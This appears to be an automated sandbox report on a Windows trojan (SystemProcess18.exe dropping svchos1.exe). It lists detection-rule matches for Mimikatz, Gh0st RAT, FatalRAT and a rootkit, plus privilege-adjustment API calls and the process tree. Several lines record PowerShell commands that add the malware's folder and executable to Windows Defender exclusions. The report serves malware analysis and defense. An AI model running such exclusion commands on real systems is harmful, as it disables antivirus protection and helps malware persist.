          Source: 29.2.svchos1.exe.317cd38.5.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, score = , reference = not set, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 29.2.svchos1.exe.317cd38.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
          Source: 29.2.svchos1.exe.318c380.6.raw.unpack, type: UNPACKEDPEMatched rule: GhostDragon_Gh0stRAT date = 2016-04-23, hash4 = b803381535ac24ce7c8fdcf6155566d208dfca63fd66ec71bbc6754233e251f5, hash3 = 6c7f8ba75889e0021c4616fcbee86ac06cd7f5e1e355e0cbfbbb5110c08bb6df, hash2 = 99ee5b764a5db1cb6b8a4f62605b5536487d9c35a28a23de8f9174659f65bcb2, hash1 = f9a669d22866cd041e2d520c5eb093188962bea8864fdfd0c0abb2b254e9f197, author = Florian Roth, description = Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report, reference = https://blog.cylance.com/the-ghost-dragon, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 29.2.svchos1.exe.318c380.6.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, score = , reference = not set, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 29.2.svchos1.exe.318c380.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
          Source: 29.2.svchos1.exe.2a8cd04.4.raw.unpack, type: UNPACKEDPEMatched rule: GhostDragon_Gh0stRAT date = 2016-04-23, hash4 = b803381535ac24ce7c8fdcf6155566d208dfca63fd66ec71bbc6754233e251f5, hash3 = 6c7f8ba75889e0021c4616fcbee86ac06cd7f5e1e355e0cbfbbb5110c08bb6df, hash2 = 99ee5b764a5db1cb6b8a4f62605b5536487d9c35a28a23de8f9174659f65bcb2, hash1 = f9a669d22866cd041e2d520c5eb093188962bea8864fdfd0c0abb2b254e9f197, author = Florian Roth, description = Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report, reference = https://blog.cylance.com/the-ghost-dragon, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 29.2.svchos1.exe.2a8cd04.4.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, score = , reference = not set, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 29.2.svchos1.exe.2a8cd04.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
          Source: 29.2.svchos1.exe.2a7d6bc.3.raw.unpack, type: UNPACKEDPEMatched rule: GhostDragon_Gh0stRAT date = 2016-04-23, hash4 = b803381535ac24ce7c8fdcf6155566d208dfca63fd66ec71bbc6754233e251f5, hash3 = 6c7f8ba75889e0021c4616fcbee86ac06cd7f5e1e355e0cbfbbb5110c08bb6df, hash2 = 99ee5b764a5db1cb6b8a4f62605b5536487d9c35a28a23de8f9174659f65bcb2, hash1 = f9a669d22866cd041e2d520c5eb093188962bea8864fdfd0c0abb2b254e9f197, author = Florian Roth, description = Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report, reference = https://blog.cylance.com/the-ghost-dragon, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 29.2.svchos1.exe.2a7d6bc.3.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, score = , reference = not set, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 29.2.svchos1.exe.2a7d6bc.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
          Source: 28.2.svchos1.exe.357d6bc.3.raw.unpack, type: UNPACKEDPEMatched rule: GhostDragon_Gh0stRAT date = 2016-04-23, hash4 = b803381535ac24ce7c8fdcf6155566d208dfca63fd66ec71bbc6754233e251f5, hash3 = 6c7f8ba75889e0021c4616fcbee86ac06cd7f5e1e355e0cbfbbb5110c08bb6df, hash2 = 99ee5b764a5db1cb6b8a4f62605b5536487d9c35a28a23de8f9174659f65bcb2, hash1 = f9a669d22866cd041e2d520c5eb093188962bea8864fdfd0c0abb2b254e9f197, author = Florian Roth, description = Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report, reference = https://blog.cylance.com/the-ghost-dragon, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 28.2.svchos1.exe.357d6bc.3.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, score = , reference = not set, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 28.2.svchos1.exe.357d6bc.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
          Source: 28.2.svchos1.exe.36bcd38.5.raw.unpack, type: UNPACKEDPEMatched rule: GhostDragon_Gh0stRAT date = 2016-04-23, hash4 = b803381535ac24ce7c8fdcf6155566d208dfca63fd66ec71bbc6754233e251f5, hash3 = 6c7f8ba75889e0021c4616fcbee86ac06cd7f5e1e355e0cbfbbb5110c08bb6df, hash2 = 99ee5b764a5db1cb6b8a4f62605b5536487d9c35a28a23de8f9174659f65bcb2, hash1 = f9a669d22866cd041e2d520c5eb093188962bea8864fdfd0c0abb2b254e9f197, author = Florian Roth, description = Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report, reference = https://blog.cylance.com/the-ghost-dragon, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 28.2.svchos1.exe.36bcd38.5.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, score = , reference = not set, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 28.2.svchos1.exe.36bcd38.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
          Source: 28.2.svchos1.exe.358cd04.1.raw.unpack, type: UNPACKEDPEMatched rule: GhostDragon_Gh0stRAT date = 2016-04-23, hash4 = b803381535ac24ce7c8fdcf6155566d208dfca63fd66ec71bbc6754233e251f5, hash3 = 6c7f8ba75889e0021c4616fcbee86ac06cd7f5e1e355e0cbfbbb5110c08bb6df, hash2 = 99ee5b764a5db1cb6b8a4f62605b5536487d9c35a28a23de8f9174659f65bcb2, hash1 = f9a669d22866cd041e2d520c5eb093188962bea8864fdfd0c0abb2b254e9f197, author = Florian Roth, description = Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report, reference = https://blog.cylance.com/the-ghost-dragon, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 28.2.svchos1.exe.358cd04.1.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, score = , reference = not set, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 28.2.svchos1.exe.358cd04.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
          Source: 28.2.svchos1.exe.36cc380.4.raw.unpack, type: UNPACKEDPEMatched rule: GhostDragon_Gh0stRAT date = 2016-04-23, hash4 = b803381535ac24ce7c8fdcf6155566d208dfca63fd66ec71bbc6754233e251f5, hash3 = 6c7f8ba75889e0021c4616fcbee86ac06cd7f5e1e355e0cbfbbb5110c08bb6df, hash2 = 99ee5b764a5db1cb6b8a4f62605b5536487d9c35a28a23de8f9174659f65bcb2, hash1 = f9a669d22866cd041e2d520c5eb093188962bea8864fdfd0c0abb2b254e9f197, author = Florian Roth, description = Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report, reference = https://blog.cylance.com/the-ghost-dragon, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 28.2.svchos1.exe.36cc380.4.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, score = , reference = not set, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 28.2.svchos1.exe.36cc380.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
          Source: 29.2.svchos1.exe.2980984.2.unpack, type: UNPACKEDPEMatched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, score = , reference = not set, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 29.2.svchos1.exe.2980984.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
          Source: 29.2.svchos1.exe.2980984.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_FatalRAT author = ditekSHen, description = Detects FatalRAT
          Source: 28.2.svchos1.exe.3480984.2.unpack, type: UNPACKEDPEMatched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, score = , reference = not set, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 28.2.svchos1.exe.3480984.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
          Source: 28.2.svchos1.exe.3480984.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_FatalRAT author = ditekSHen, description = Detects FatalRAT
          Source: classification engineClassification label: mal100.troj.evad.winEXE@1006/40@2/2
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035E1B30 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,28_2_035E1B30
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035E9770 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,28_2_035E9770
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035DB7A0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,28_2_035DB7A0
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_030A1B30 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,29_2_030A1B30
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_030A9770 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,29_2_030A9770
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_0309B7A0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,29_2_0309B7A0
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035D4700 GetDiskFreeSpaceExA,LoadLibraryA,GetProcAddress,lstrcpy,GetDiskFreeSpaceExA,RegQueryValueExA,RegQueryValueExA,strchr,strncat,strncat,strncat,strchr,RegQueryValueExA,wsprintfA,RegQueryValueExA,RegEnumKeyExA,wsprintfA,wsprintfA,strchr,RegEnumValueA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrcat,28_2_035D4700
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035E1A50 GetCurrentProcessId,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,Sleep,28_2_035E1A50
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_006C6673 CoInitialize,CoCreateInstance,28_2_006C6673
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_0071D414 SelectObject,FindResourceW,LoadResource,LockResource,FreeResource,SizeofResource,28_2_0071D414
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035DF0E0 Sleep,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetCurrentThreadId,PostThreadMessageA,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetCommandLineA,CreateMutexA,GetLastError,strstr,Sleep,Sleep,OpenSCManagerA,OpenServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,ExitProcess,CloseServiceHandle,CloseServiceHandle,Sleep,Sleep,sprintf,ExitProcess,sprintf,sprintf,GetModuleFileNameA,sprintf,Sleep,sprintf,ExitProcess,Sleep,Sleep,Sleep,Sleep,28_2_035DF0E0
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile created: C:\Users\Public\Documents\shell.txtJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3512:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7024:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7572:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5104:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5296:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7480:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2500:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7664:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3144:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1212:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4304:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5484:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3316:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1944:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7620:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6060:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3996:120:WilError_03
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Users\user\Desktop\SystemProcess18.exeMutant created: \Sessions\1\BaseNamedObjects\xiaobaituzi.com:443:MyService1
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2780:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5668:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5108:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7848:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1520:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6424:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4520:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1996:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2696:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2792:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1272:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7460:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8068:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2188:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3008:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1968:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1868:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6504:120:WilError_03
          Source: C:\Users\user\Desktop\SystemProcess18.exeMutant created: \Sessions\1\BaseNamedObjects\xiaobaituzi.com:8080:MyService
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7476:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7488:120:WilError_03
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uyw30vd4.vdq.ps1
          Source: SystemProcess18.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\SystemProcess18.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: SystemProcess18.exeVirustotal: Detection: 50%
          Source: SystemProcess18.exeReversingLabs: Detection: 41%
          Source: SystemProcess18.exeString found in binary or memory: le> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <Al
          Source: SystemProcess18.exeString found in binary or memory: le> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <Al
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile read: C:\Users\user\Desktop\SystemProcess18.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\SystemProcess18.exe "C:\Users\user\Desktop\SystemProcess18.exe"
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md C:\Users\Public\Documents\MM
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Users\user\Desktop\SystemProcess18.exe "C:\Users\user\Desktop\SystemProcess18.exe"
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md C:\Users\Public\Documents\MM
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md C:\Users\Public\Documents\MM
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SystemProcess18.exe'"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SystemProcess18.exe'"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Users\Public\Documents\MM\svchos1.exe C:\Users\Public\Documents\MM\svchos1.exe
          Source: C:\Users\Public\Documents\MM\svchos1.exeProcess created: C:\Users\Public\Documents\MM\svchos1.exe "C:\Users\Public\Documents\MM\svchos1.exe"
          Source: C:\Users\Public\Documents\MM\svchos1.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\Public\Documents\MM\svchos1.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'"
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\Public\Documents\MM\svchos1.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM\svchos1.exe'"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\Public\Documents\MM\svchos1.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM\svchos1.exe'"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
